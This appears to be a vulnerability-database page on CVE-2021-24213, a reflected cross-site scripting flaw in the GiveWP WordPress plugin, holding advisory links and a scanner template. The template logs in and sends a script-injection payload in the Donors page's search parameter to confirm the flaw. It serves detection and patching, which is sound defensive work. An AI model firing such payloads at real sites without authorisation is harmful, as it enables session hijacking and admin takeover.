| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| WordPress GiveWP 2.9.7 Cross Site Scripting Vulnerability | 23 Mar 202100:00 | – | zdt | |
| CVE-2021-24213 | 22 May 202102:01 | – | circl | |
| WordPress GiveWP 跨站脚本漏洞 | 23 Mar 202100:00 | – | cnnvd | |
| WordPress GiveWP Cross-Site Scripting Vulnerability | 30 Mar 202100:00 | – | cnvd | |
| CVE-2021-24213 | 12 Apr 202114:00 | – | cve | |
| CVE-2021-24213 GiveWP < 2.10.0 - Reflected Cross Site Scripting (XSS) | 12 Apr 202114:00 | – | cvelist | |
| EUVD-2021-11127 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-24213 | 12 Apr 202114:15 | – | nvd | |
| WordPress GiveWP Plugin < 2.10.0 XSS Vulnerability | 4 Jun 202100:00 | – | openvas | |
| CVE-2021-24213 | 12 Apr 202114:15 | – | osv |
id: CVE-2021-24213
info:
name: GiveWP <= 2.9.7 - Cross-Site Scripting
author: Shivam Kamboj
severity: medium
description: |
GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress versions before 2.10.0 is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in the admin Donors page.
impact: |
Attackers can execute arbitrary scripts in authenticated admin browsers, potentially leading to session hijacking, privilege escalation, WordPress admin account takeover, malicious plugin installation, and website defacement.
remediation: |
Update GiveWP plugin to version 2.10.0 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24213
- https://wpscan.com/vulnerability/da4ab508-a423-4c7f-a1d4-42ec6f989309
- https://bentl.ee/posts/cve-givewp/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24213
epss-score: 0.0137
epss-percentile: 0.68656
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: givewp
product: givewp
framework: wordpress
tags: cve,cve2021,wordpress,wp,wp-plugin,give,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, 'wordpress_logged_in')
condition: and
internal: true
- raw:
- |
GET /wp-admin/edit.php?post_type=give_forms&page=give-donors&view=donors&s=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "><script>alert(document.domain)</script>", "give-donors")'
condition: and
# digest: 490a00463044022061a8c6fcb5b7c2f36afc3d338e05654a19251f26671db4f50be455bd28881cfb022005a55a65d447c6ce8f10d75239af1a9eeb4c31945b9d515b982d3c558f491e4c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation